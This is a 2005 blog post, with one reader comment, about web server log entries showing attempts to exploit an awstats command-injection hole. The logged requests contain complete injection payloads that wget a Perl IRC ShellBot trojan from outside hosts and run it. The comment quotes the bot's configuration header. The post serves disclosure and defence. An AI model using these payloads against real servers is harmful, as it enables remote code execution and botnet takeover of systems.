Friday, July 8, 2005

potential security hole in awstats [updated]


I noticed the following entries in my log file:


66.139.73.109 - - [09/Jul/2005:00:01:37 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;

killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;

rm%20-rf%20a.txt*;echo| HTTP/1.1" 200 749 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

66.139.73.109 - - [09/Jul/2005:00:01:38 -0700] "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;

killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;

rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;

killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;

rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;

killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;

rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;

killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;

rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"


It appears that this person is attempting to have awstats download a perl script and have it executed on the web server.  When I looked at the script that it is attempting to download, it attempts to connect to an irc server and sends information there. (ClamAV identifies this script as "Trojan.Perl.Shellbot.C")




I sent emails to the administrations of the various involved networks to have them stop this activity.  Also, since I am assuming that the script writer is attempting to exploit a hole, that there is, or was, one in awstats.  I have left a message on the Awstats developer forum, so they can look into this potential problem.


Update:  This was fixed in the 6.4 version of awstats.  If you are running an earlier version, you should update your awstats install.


Technorati Tags: ,

1 comment:

  1. This is part of the log
    219.166.34.48 - - [16/Nov/2005:02:12:35 +0100] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/mkaomike/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
    This a.txt file has the header
    #!/usr/bin/perl
    #
    # ShellBOT - FBI TEAM Corporation
    #
    # 0ldW0lf - effbeeye81@aol.com
    # - www.security.cnc.net
    #
    #
    #
    ################ CONFIGURACAO #################################################################
    my $processo = '/usr/local/apache/bin/httpd -DSSL'; # Nome do processo que vai aparece no ps #
    #----------------------------------------------################################################
    my $linas_max='8'; # Evita o flood :) depois de X linhas #
    #----------------------------------------------################################################
    my $sleep='4'; # ele dorme X segundos #
    ##################### IRC #####################################################################
    my @adms=("the-brain","adilcm","alalah"); # Nick do administrador
    #
    #----------------------------------------------################################################
    my @canais=("#kit *"); # Caso haja senha ("#canal :senha") #
    #----------------------------------------------################################################
    my $nick='`alah'; # Nick do bot. Caso esteja em uso vai aparecer #
    # aparecer com numero radonamico no final #
    #----------------------------------------------################################################
    my $ircname = 'super'; # User ID
    #
    #----------------------------------------------################################################
    chop (my $realname = `uname -a`); # Full Name #
    #----------------------------------------------################################################
    $servidor='213.150.48.155' unless $servidor; # Servidor de irc que vai ser usado #
    # caso não seja especificado no argumento #
    #----------------------------------------------################################################
    my $porta='6667'; # Porta do servidor de irc #
    ################ ACESSO A SHELL ###############################################################
    my $secv = 1; # 1/0 pra habilita/desabilita acesso a shell #
    ###############################################################################################

    ReplyDelete

Unlocking Seamless Integration: Navigating Unexpected Hubitat Device Queries and VLAN Challenges for a Smoother Home Automation Experience

During my network debugging efforts , I came across an intriguing observation related to the two Hubitat devices on our network. The logs b...